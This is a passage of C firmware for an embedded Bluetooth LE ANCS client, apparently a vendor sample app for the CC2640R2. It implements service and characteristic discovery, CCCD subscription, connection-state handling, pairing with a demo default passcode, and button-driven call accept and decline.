GATT_SendRsp(pAttRsp->connHandle, pAttRsp->method, &(pAttRsp->msg));\n if ((status != blePending) && (status != MSG_BUFFER_NOT_AVAIL))\n {\n // Disable connection event end notice\n HCI_EXT_ConnEventNoticeCmd(pAttRsp->connHandle, selfEntity, 0);\n\n // We're done with the response message\n AncsApp_freeAttRsp(status);\n }\n else\n {\n // Continue retrying\n Display_print1(dispHandle, 5, 0, \"Rsp send retry: %d\", rspTxRetry);\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_freeAttRsp\n *\n * @brief Free ATT response message.\n *\n * @param status - response transmit status\n *\n * @return none\n */\nstatic void AncsApp_freeAttRsp(uint8_t status)\n{\n // See if there's a pending ATT response message\n if (pAttRsp != NULL)\n {\n // See if the response was sent out successfully\n if (status == SUCCESS)\n {\n Display_print1(dispHandle, 5, 0, \"Rsp sent retry: %d\", rspTxRetry);\n }\n else\n {\n // Free response payload\n GATT_bm_free(&pAttRsp->msg, pAttRsp->method);\n\n Display_print1(dispHandle, 5, 0, \"Rsp retry failed: %d\", rspTxRetry);\n }\n\n // Free response message\n ICall_freeMsg(pAttRsp);\n\n // Reset our globals\n pAttRsp = NULL;\n rspTxRetry = 0;\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_discoverService\n *\n * @brief Function to handle the discovery of the ANCS service\n *\n * @param pMsg - GATT message to process, may be NULL in DISC_ANCS_START\n *\n * @return none\n */\nstatic void AncsApp_discoverService(gattMsgEvent_t *pMsg)\n{\n // These will hold the ANCS service start and end handles that are returned after\n // GATT_DiscPrimaryServiceByUUID() function receives a response from the iPhone.\n static uint16_t Ancs_svcStartHdl;\n static uint16_t Ancs_svcEndHdl;\n\n // Stores the error code, should the discovery process fail at any state.\n static uint8_t errorcode = 0;\n\n // Enter the state machine.\n switch (discoveryState)\n {\n\n // Wait to start the discovery process till after the MTU exchange has occurred.\n case ANCS_EXCHANGE_MTU:\n {\n // If the MTU exchange has occurred, proceed to the discovery process.\n if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t1\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tExchange MTUs\");\n#endif\n discoveryState = ANCS_DISC_SERVICE;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n }\n break;\n\n // Perform a GATT Discover Primary Service By Service UUID to located the ANCS\n // handles.\n case ANCS_DISC_SERVICE:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t2\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the ANCS\");\n#endif\n // Initialize the ANCS handles to zero.\n Ancs_svcStartHdl = 0;\n Ancs_svcEndHdl = 0;\n\n // Store the ANCS UUID for GATT request.\n uint8_t uuid[ATT_UUID_SIZE] = {ANCSAPP_ANCS_SVC_UUID};\n\n // Discover the ANCS by UUID.\n uint8_t discCheck = GATT_DiscPrimaryServiceByUUID(Ancs_connHandle, uuid, ATT_UUID_SIZE, ICall_getEntityId());\n\n // If successfully discovered proceed, throw error if not.\n if(discCheck == SUCCESS)\n discoveryState = ANCS_STORE_SERVICE_HANDLES;\n else\n {\n Display_print1(dispHandle, 12, 0, \"ANCS_DISC_SERVICE FAILURE, Error code:\\t%d\",discCheck);\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 1;\n }\n }\n break;\n\n // Store the ANCS handles requested in the previous state.\n case ANCS_STORE_SERVICE_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t3\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the ANCS handles\");\n#endif\n // Did the application receive a response from the GATT Disc Primary Service?\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP )\n {\n // Check if the ANCS was found.\n if (pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n // Found the ANCS, so store the handles and proceed.\n Ancs_svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n Ancs_svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n discoveryState = ANCS_DISC_CHARS;\n }\n else\n {\n // The ANCS was not found.\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_SERVICE_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 2;\n }\n\n }\n }\n break;\n\n // Use the ANCS handles to discovery the ANCS's characteristics' handles.\n case ANCS_DISC_CHARS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t4\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the ANCS characteristics\");\n#endif\n // Check if service handle discovery event has completed.\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP )\n {\n if(pMsg->hdr.status == bleProcedureComplete)\n {\n // Sanity check to make sure the handle is valid before proceeding.\n if (Ancs_svcStartHdl != 0)\n {\n // Discover all characteristics of the ANCS.\n uint8_t discCheck = GATT_DiscAllChars(Ancs_connHandle, Ancs_svcStartHdl, Ancs_svcEndHdl, ICall_getEntityId());\n\n // If the request was successfully sent, proceed with the discovery process.\n if (discCheck == SUCCESS)\n {\n discoveryState = ANCS_STORE_CHARS_HANDLES;\n }\n // If not, throw an error.\n else\n {\n Display_print1(dispHandle, 12, 0, \"ANCS_DISC_CHARS FAILURE, Error code:\\t%d\",discCheck);\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 3;\n }\n }\n }\n }\n }\n break;\n\n // Store the retrieved ANCS characteristic handles.\n case ANCS_STORE_CHARS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t5\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the ANCS characteristics' handles\");\n#endif\n // Wait until GATT \"Read by type response\" is received, then confirm that the correct number of\n // pairs are present, and that their length is correct\n if (pMsg->method == ATT_READ_BY_TYPE_RSP )\n {\n if ( (pMsg->msg.readByTypeRsp.numPairs == NUMBER_OF_ANCS_CHARS) && (pMsg->msg.readByTypeRsp.len == CHAR_DESC_HDL_UUID128_LEN) )\n {\n // Pointer to the pair list data in the GATT response.\n uint8_t *pCharPairList;\n // Will store the start and end handles of the current pair.\n uint16_t charStartHandle;\n uint16_t charEndHandle;\n // Stores to the UUID of the current pair.\n uint16_t charUuid;\n // Stores what pair the loop is currently processing.\n uint8_t currentCharIndex;\n\n // Set the pair pointer to the first pair.\n pCharPairList = pMsg->msg.readByTypeRsp.pDataList;\n\n // Iterate through all three pairs found.\n for(currentCharIndex = NUMBER_OF_ANCS_CHARS; currentCharIndex > 0 ; currentCharIndex--)\n {\n // Extract the starting handle, ending handle, and UUID of the current characteristic.\n charStartHandle = BUILD_UINT16(pCharPairList[3], pCharPairList[4]);\n // To extract the end handle for each characteristic, take the starting handle of the next characteristic\n // and subtract one from it.\n charEndHandle = BUILD_UINT16(pCharPairList[CHAR_DESC_HDL_UUID128_LEN], pCharPairList[CHAR_DESC_HDL_UUID128_LEN + 1]) - 1;\n charUuid = BUILD_UINT16(pCharPairList[5], pCharPairList[6]);\n\n // Store the start and end handles in the handle cache corresponding to\n // their UUID.\n switch (charUuid)\n {\n // If it's the Notification Source.\n case ANCSAPP_NOTIF_SRC_CHAR_UUID:\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END] = charEndHandle;\n break;\n // If it's the Control Point.\n case ANCSAPP_CTRL_PT_CHAR_UUID:\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_END] = charEndHandle;\n break;\n // If it's the Data Source.\n case ANCSAPP_DATA_SRC_CHAR_UUID:\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END] = charEndHandle;\n break;\n\n default:\n break;\n }\n\n // If this is the final characteristic found in the response,\n // reset its end handle to the ANCS's end handle. This is because\n // there is no next staring handle to use as a reference and subtract one\n // from, so instead the ending handle of the ANCS must be used.\n if(currentCharIndex == LAST_ANCS_CHAR)\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END] = Ancs_svcEndHdl;\n\n // Increment the pair pointer to the next pair.\n pCharPairList += CHAR_DESC_HDL_UUID128_LEN;\n }\n\n // Sanity check to ensure that each start handle is valid and\n // less than each respective end handle.\n if(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] != 0 &&\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] != 0 &&\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] != 0)\n {\n if(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] < Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END] &&\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] < Ancs_handleCache[ANCS_CTRL_POINT_HDL_END] &&\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] < Ancs_handleCache[ANCS_DATA_SRC_HDL_END])\n {\n discoveryState = ANCS_DISC_NS_DESCS;\n }\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 4;\n }\n }\n // Throw an error if the handles are invalid.\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 5;\n }\n }\n // Throw an error if the length or number of pairs is incorrect.\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 6;\n }\n }\n }\n break;\n\n // Discover the Notification Source's descriptors (namely, the CCCD) using the start\n // and end handle stored in the handle cache.\n case ANCS_DISC_NS_DESCS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t6\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the Notification Source's CCCD\");\n#endif\n // Wait until the characteristic handle discovery has finished.\n if ( (pMsg->method == ATT_READ_BY_TYPE_RSP) && (pMsg->hdr.status == bleProcedureComplete) )\n {\n // Discover the ANCS Notification Source descriptors.\n uint8_t discCheck = GATT_DiscAllCharDescs(Ancs_connHandle,\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START],\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END],\n ICall_getEntityId());\n // If the discovery was successful, proceed.\n if ( discCheck == SUCCESS )\n discoveryState = ANCS_STORE_NS_DESCS_HANDLES;\n // If not, throw an error and invalidate the CCCD handle in the handle cache.\n else\n {\n Display_print0(dispHandle, 6, 0, \"ANCS_DISC_NS_DESCS FAILURE\");\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] = 0;\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 7;\n }\n }\n }\n break;\n\n // Store the retrieved Notification Source descriptors (namely, the CCCD).\n case ANCS_STORE_NS_DESCS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t7\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the Notification Source's CCCD handle\");\n#endif\n // Wait for the discovery response.\n if (pMsg->method == ATT_FIND_INFO_RSP )\n {\n // Sanity check to validate that at least one descriptors pair was found,\n // and that the pair length is correct.\n if ( (pMsg->msg.findInfoRsp.numInfo > 0) && (pMsg->msg.findInfoRsp.format == ATT_HANDLE_BT_UUID_TYPE) )\n {\n // This will keep track of the current pair being processed.\n uint8_t currentPair;\n\n // Iterate through the pair list.\n for(currentPair = 0; currentPair < pMsg->msg.findInfoRsp.numInfo; currentPair++)\n {\n // Check if the pair is a CCCD.\n if (ATT_BT_PAIR_UUID(pMsg->msg.findInfoRsp.pInfo, currentPair) == GATT_CLIENT_CHAR_CFG_UUID)\n {\n // If so, store the handle in the handle cache, and proceed.\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_CCCD] = ATT_BT_PAIR_HANDLE(pMsg->msg.findInfoRsp.pInfo, currentPair);\n discoveryState = ANCS_DISC_DS_DESCS;\n }\n }\n }\n }\n }\n break;\n\n // Discover the Data Source's descriptors (namely, the CCCD) using the start\n // and end handle stored in the handle cache.\n case ANCS_DISC_DS_DESCS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t8\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the Data Source's CCCD\");\n#endif\n // Wait until the Notification Source descriptors discovery has finished.\n if ( (pMsg->method == ATT_FIND_INFO_RSP) && (pMsg->hdr.status == bleProcedureComplete) )\n {\n\n // Discover ANCS Notification Source CCCD\n uint8_t discCheck = GATT_DiscAllCharDescs(Ancs_connHandle,\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] + 1,\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END],\n ICall_getEntityId());\n // If the discovery was successful, proceed.\n if (discCheck == SUCCESS )\n discoveryState = ANCS_STORE_DS_DESCS_HANDLES;\n // If not, throw an error and invalidate the CCCD handle in the handle cache.\n else\n {\n Display_print0(dispHandle, 6, 0, \"ANCS_DISC_DS_DESCS FAILURE\");\n Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD] = 0;\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 8;\n }\n }\n }\n break;\n\n // Discover the Data Source's descriptors (namely, the CCCD) using the start\n // and end handle stored in the handle cache.\n case ANCS_STORE_DS_DESCS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t9\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the Data Source's CCCD handle\");\n#endif\n // Wait for the discovery response.\n if (pMsg->method == ATT_FIND_INFO_RSP )\n {\n // Sanity check to validate that at least one descriptors pair was found,\n // and that the pair length is correct.\n if ( (pMsg->msg.findInfoRsp.numInfo > 0) && (pMsg->msg.findInfoRsp.format == ATT_HANDLE_BT_UUID_TYPE) )\n {\n // This will keep track of the current pair being processed.\n uint8_t currentPair;\n\n // Iterate through the pair list.\n for(currentPair = 0; currentPair < pMsg->msg.findInfoRsp.numInfo; currentPair++)\n {\n // Check if the pair is a CCCD.\n if (ATT_BT_PAIR_UUID(pMsg->msg.findInfoRsp.pInfo, currentPair) == GATT_CLIENT_CHAR_CFG_UUID)\n {\n // If so, store the handle in the handle cache, and proceed to the subscription process.\n Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD] = ATT_BT_PAIR_HANDLE(pMsg->msg.findInfoRsp.pInfo, currentPair);\n discoveryState = ANCS_WRITE_DS_CCCD;\n\n // The next state may need to run multiple times, thus it relies on\n // event posts as opposed to a singular event like a BLE complete response.\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n }\n }\n }\n }\n break;\n\n // Subscribe to the Data Source. This is done first as when the Notification Source\n // is subscribed too, it will immediately send GATT notifications for every ANCS notification\n // present. This can hinder app functionality as some ANCS notifications maybe ignored\n // due to the app receiving them before it is initialized to a state which can process them.\n // To avoid this, we subscribe to the Notification Source second.\n case ANCS_WRITE_DS_CCCD:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t10\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tSubscribe to the Data Source\");\n#endif\n // Call the function which writes to the Data Source's CCCD.\n uint8_t check = Ancs_subsDataSrc();\n\n // If it is successful, advance the state. If the check is not\n // successful, a loop will be sustained until the subscription succeeds.\n if(check == SUCCESS)\n discoveryState = ANCS_WRITE_NS_CCCD;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n break;\n\n // Subscribe to the Notification source second for the reason listed in the last state.\n case ANCS_WRITE_NS_CCCD:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t11\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tSubscribe to the Notification Source\");\n#endif\n /// Call the function which writes to the Notification Source's CCCD.\n uint8_t check = Ancs_subsNotifSrc();\n\n // If it is successful, set the discovery state to FINISH and the app state to READY.\n // If the check is not successful, a loop will be sustained until the subscription succeeds.\n if(check == SUCCESS)\n {\n discoveryState = ANCS_DISC_FINISH;\n ancsAppState = ANCS_STATE_READY;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t12\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tProcessing notification data\");\n#endif\n }\n else\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n break;\n }\n if(errorcode != 0)\n {\n#ifdef USE_GUI_COMPOSER\n Display_print1(dispHandle, 16, 0, \"Discovery State:\\tDiscovery Error: %d\",errorcode);\n#else\n Display_print1(dispHandle, 16, 0, \"Discovery Error: %d\",errorcode);\n#endif\n }\n return;\n}\n\n/*********************************************************************\n * @fn AncsApp_processAppMsg\n *\n * @brief Process an incoming callback from a profile.\n *\n * @param pMsg - message to process\n *\n * @return None.\n */\nstatic void AncsApp_processAppMsg(ancsAppEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n // State change event triggered.\n case ANCSAPP_STATE_CHANGE_EVT:\n {\n AncsApp_processStateChangeEvt((gaprole_States_t)pMsg->hdr.state);\n }\n break;\n\n // Pairing event triggered.\n case ANCSAPP_PAIRING_STATE_EVT:\n {\n AncsApp_processPairState(pMsg->hdr.state, *pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // Passcode event triggered.\n case ANCSAPP_PASSCODE_NEEDED_EVT:\n {\n AncsApp_processPasscode(*pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // CC2640R2 board button event triggered.\n case ANCSAPP_KEY_CHANGE_EVT:\n {\n AncsApp_handleKeysEvt(pMsg->hdr.state);\n\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_stateChangeCB\n *\n * @brief Callback from GAP Role indicating a role state change.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void AncsApp_stateChangeCB(gaprole_States_t newState)\n{\n AncsApp_enqueueMsg(ANCSAPP_STATE_CHANGE_EVT, newState, 0);\n}\n\n/*********************************************************************\n * @fn AncsApp_processStateChangeEvt\n *\n * @brief Process a pending GAP Role state change event.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void AncsApp_processStateChangeEvt(gaprole_States_t newState)\n{\n#ifdef PLUS_BROADCASTER\n static bool firstConnFlag = false;\n#endif // PLUS_BROADCASTER\n\n switch ( newState )\n {\n case GAPROLE_STARTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n uint8_t systemId[DEVINFO_SYSTEM_ID_LEN];\n\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n\n // use 6 bytes of device address for 8 bytes of system ID value\n systemId[0] = ownAddress[0];\n systemId[1] = ownAddress[1];\n systemId[2] = ownAddress[2];\n\n // set middle bytes to zero\n systemId[4] = 0x00;\n systemId[3] = 0x00;\n\n // shift three bytes up\n systemId[7] = ownAddress[5];\n systemId[6] = ownAddress[4];\n systemId[5] = ownAddress[3];\n\n DevInfo_SetParameter(DEVINFO_SYSTEM_ID, DEVINFO_SYSTEM_ID_LEN, systemId);\n\n // Display device address\n Display_print0(dispHandle, 1, 0, Util_convertBdAddr2Str(ownAddress));\n Display_print0(dispHandle, 2, 0, \"Initialized\");\n }\n break;\n\n case GAPROLE_ADVERTISING:\n#ifdef USE_WATCHDOG_TIMER\n Util_startClock(&periodicClock);\n#endif\n Display_print0(dispHandle, 2, 0, \"Advertising\");\n break;\n\n#ifdef PLUS_BROADCASTER\n // After a connection is dropped, a device in PLUS_BROADCASTER will continue\n // sending non-connectable advertisements and shall send this change of\n // state to the application. These are then disabled here so that sending\n // connectable advertisements can resume.\n case GAPROLE_ADVERTISING_NONCONN:\n {\n#ifdef USE_WATCHDOG_TIMER\n Util_startClock(&periodicClock);\n#endif\n uint8_t advertEnabled = FALSE;\n\n // Disable non-connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADV_NONCONN_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n advertEnabled = TRUE;\n\n // Enabled connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n // Reset flag for next connection.\n firstConnFlag = false;\n\n AncsApp_freeAttRsp(bleNotConnected);\n }\n break;\n#endif //PLUS_BROADCASTER\n\n case GAPROLE_CONNECTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n uint8_t systemId[DEVINFO_SYSTEM_ID_LEN];\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n DevInfo_SetParameter(DEVINFO_SYSTEM_ID, DEVINFO_SYSTEM_ID_LEN, systemId);\n\n uint8_t peerAddress[B_ADDR_LEN];\n GAPRole_GetParameter(GAPROLE_CONN_BD_ADDR, peerAddress);\n Display_print0(dispHandle, 2, 0, \"Connected\");\n Display_print0(dispHandle, 3, 0, Util_convertBdAddr2Str(peerAddress));\n\n\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tConnected\");\n#endif\n\n // Initialize the app and discovery state to their respective beginning.\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n appAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n discoveryState = ANCS_EXCHANGE_MTU;\n ancsAppState = ANCS_STATE_DISCOVERY;\n\n #ifdef PLUS_BROADCASTER\n // Only turn advertising on for this state when we first connect\n // otherwise, when we go from connected_advertising back to this state\n // we will be turning advertising back on.\n if (firstConnFlag == false)\n {\n uint8_t advertEnabled = FALSE; // Turn on Advertising\n\n // Disable connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n // Set to true for non-connectable advertising.\n advertEnabled = TRUE;\n\n // Enable non-connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADV_NONCONN_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n firstConnFlag = true;\n }\n #endif // PLUS_BROADCASTER\n }\n break;\n\n case GAPROLE_CONNECTED_ADV:\n Display_print0(dispHandle, 2, 0, \"Connected Advertising\");\n break;\n\n case GAPROLE_WAITING:\n // Free the ATT response, clear the handle cache, and clear the ANCS notification queue.\n#ifdef USE_WATCHDOG_TIMER\n Util_stopClock(&periodicClock);\n#endif\n AncsApp_freeAttRsp(bleNotConnected);\n VOID memset(Ancs_handleCache, '\\0', HDL_CACHE_LEN*2);\n Display_print0(dispHandle, 3, 0, \"Disconnected\");\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDisconnected\");\n#endif\n Ancs_popAllNotifsFromQueue();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 4, 30);\n break;\n\n case GAPROLE_WAITING_AFTER_TIMEOUT:\n // Free the ATT response, clear the handle cache, and clear the ANCS notification queue.\n#ifdef USE_WATCHDOG_TIMER\n Util_stopClock(&periodicClock);\n#endif\n AncsApp_freeAttRsp(bleNotConnected);\n VOID memset(Ancs_handleCache, '\\0', HDL_CACHE_LEN*2);\n Display_print0(dispHandle, 3, 0, \"Timed Out\");\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tTimed out\");\n#endif\n Ancs_popAllNotifsFromQueue();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 4, 30);\n\n #ifdef PLUS_BROADCASTER\n // Reset flag for next connection.\n firstConnFlag = false;\n #endif // PLUS_BROADCASTER\n break;\n\n case GAPROLE_ERROR:\n Display_print0(dispHandle, 2, 0, \"Error\");\n break;\n\n default:\n Display_clearLine(dispHandle, 2);\n break;\n }\n\n}\n\n/*********************************************************************\n * @fn AncsApp_pairStateCB\n *\n * @brief Pairing state callback.\n *\n * @return none\n */\nstatic void AncsApp_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status)\n{\n uint8_t *pData;\n\n // Allocate space for the event data.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = status;\n\n // Queue the event.\n AncsApp_enqueueMsg(ANCSAPP_PAIRING_STATE_EVT, state, pData);\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processPairState\n *\n * @brief Process the new paring state.\n *\n * @return none\n */\nstatic void AncsApp_processPairState(uint8_t state, uint8_t status)\n{\n if (state == GAPBOND_PAIRING_STATE_STARTED)\n {\n Display_print0(dispHandle, 2, 0, \"Pairing started\");\n }\n else if (state == GAPBOND_PAIRING_STATE_COMPLETE)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Pairing Successful\");\n\n // Now that the device has successfully paired to the iPhone,\n // the subscription will not fail due to insufficient authentication.\n discoveryState = ANCS_WRITE_DS_CCCD;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Pairing fail: %d\", status);\n }\n }\n else if (state == GAPBOND_PAIRING_STATE_BONDED)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bonding Successful\");\n }\n }\n else if (state == GAPBOND_PAIRING_STATE_BOND_SAVED)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bond save success\");\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Bond save failed: %d\", status);\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_handleKeysEvt\n *\n * @brief Handles all key events for this device.\n *\n * @param keys - bit field for key events.\n *\n * @return none\n */\nstatic void AncsApp_handleKeysEvt(uint8_t keys)\n{\n // If: Both keys are pressed.\n if (keys == IO_BUTTON_BOTH)\n Display_clearLines(dispHandle, 4, 30);\n\n // Else If: A single key is pressed.\n else\n {\n // Calls the function to perform a negative action upon the current notification.\n if (keys == IO_BUTTON_LEFT)\n Ancs_acceptIncomingCall();\n\n // Calls the function to perform a positive action upon the current notification.\n else if (keys == IO_BUTTON_RIGHT)\n Ancs_declineIncomingCall();\n }\n\n return;\n}\n\n/*********************************************************************\n * @fn AncsApp_keyPressCB\n *\n * @brief Callback to the handle keys function (AncsApp_handleKeysEvt()).\n *\n * @param keys - bit field for key events.\n *\n * @return none\n */\nstatic void AncsApp_keyPressCB(uint8 keys)\n{\n // Enqueue the event.\n AncsApp_enqueueMsg(ANCSAPP_KEY_CHANGE_EVT, keys, 0);\n\n return;\n}\n\n/*********************************************************************\n * @fn AncsApp_passcodeCB\n *\n * @brief Passcode callback.\n *\n * @return none\n */\nstatic void AncsApp_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs)\n{\n uint8_t *pData;\n\n // Allocate space for the passcode event.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = uiOutputs;\n\n // Enqueue the event.\n AncsApp_enqueueMsg(ANCSAPP_PASSCODE_NEEDED_EVT, 0, pData);\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processPasscode\n *\n * @brief Process the Passcode request.\n *\n * @return none\n */\nstatic void AncsApp_processPasscode(uint8_t uiOutputs)\n{\n // This app uses a default passcode. A real-life scenario would handle all\n // pairing scenarios and likely generate this randomly.\n uint32_t passcode = B_APP_DEFAULT_PASSCODE;\n\n // Display passcode to user\n if (uiOutputs != 0)\n {\n Display_print1(dispHandle, 4, 0, \"Passcode: %d\", passcode);\n }\n\n uint16_t connectionHandle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connectionHandle);\n\n // Send passcode response\n GAPBondMgr_PasscodeRsp(connectionHandle, SUCCESS, passcode);\n}\n\n#ifdef USE_WATCHDOG_TIMER\n/*\n * ======== watchdogCallback ========\n * Watchdog interrupt callback function.\n */\nstatic void watchdogCallback(uintptr_t unused)\n{\n /* Clear watchdog interrupt flag */\n Watchdog_clear(watchdogHandle);\n Display_print0(dispHandle, 16, 0, \"Watchdog kicked!\");\n\n /* Insert timeout handling code here. */\n}\n/*********************************************************************\n * @fn AncsApp_performPeriodicTask\n *\n * @brief Perform a periodic application task. This function gets called\n * every five seconds (SBP_PERIODIC_EVT_PERIOD). In this example,\n * the value of the third characteristic in the SimpleGATTProfile\n * service is retrieved from the profile, and then copied into the\n * value of the the fourth characteristic.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AncsApp_performPeriodicTask(void)\n{\n Watchdog_clear(watchdogHandle);\n Display_print0(dispHandle, 16, 0, \"Watchdog cleared!\");\n}\n\n/*********************************************************************\n * @fn AncsApp_clockHandler\n *\n * @brief Handler function for clock timeouts.\n *\n * @param arg - event type\n *\n * @return None.\n */\nstatic void AncsApp_clockHandler(UArg arg)\n{\n // Wake up the application.\n Event_post(syncEvent, arg);\n}\n#endif\n/*********************************************************************\n * @fn AncsApp_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData - message data pointer.\n *\n * @return TRUE or FALSE\n */\nstatic uint8_t 